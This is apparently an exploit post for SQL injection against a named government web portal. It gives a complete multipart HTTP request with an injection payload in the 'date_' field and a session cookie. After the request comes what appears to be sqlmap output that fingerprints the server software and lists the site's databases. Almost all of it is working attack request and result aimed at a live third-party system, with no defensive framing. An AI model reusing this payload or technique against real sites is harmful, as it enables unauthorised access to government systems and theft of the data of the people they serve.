# Author: RootAyyıldız
# Tested on: Windows & Linux
POST /law.ar_law/ar/0/0/module.page.html HTTP/1.1
Content-Length: 552
Content-Type: multipart/form-data; boundary=-----Boundary_RTBUFPXUJV
X-Requested-With: XMLHttpRequest
Referer: http://portal.egov.sy/
Cookie: PHPSESSID=l0l5dh6v7v4dr7df3kdkph2bs0; __unam=cf5c7ec-1703e0fbfe8-5159addd-4
Host: portal.egov.sy
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----Boundary_PGUEXQLDTY
-------Boundary_PGUEXQLDTY
Content-Disposition: form-data; name="submit"
######
-------Boundary_PGUEXQLDTY
Content-Disposition: form-data; name="date_"
-1' OR 3*2*1=6 AND 000710=000710 --
-------Boundary_PGUEXQLDTY
Content-Disposition: form-data; name="doSearch"
1
-------Boundary_PGUEXQLDTY
Content-Disposition: form-data; name="kind"
0
-------Boundary_PGUEXQLDTY
Content-Disposition: form-data; name="num"
1
-------Boundary_PGUEXQLDTY
Content-Disposition: form-data; name="searchAbout"
-------Boundary_PGUEXQLDTY--
[02:53:46] [INFO] the back-end DBMS is MySQL
[02:53:59] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex'
web server operating system: Linux Ubuntu
web application technology: Nginx 1.4.6, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[02:53:59] [INFO] fetching database names
available databases [9]:
[*] c1_miniportal_db
[*] c1_miniportal_db0328
[*] c1_miniportal_db2018
[*] c1_miniportal_db_2018
[*] c1_miniportal_db_20180813
[*] c1_miniportal_db_2018_0810
[*] c1_miniportal_db_new
[*] c1_miniportal_db_test
[*] information_schema
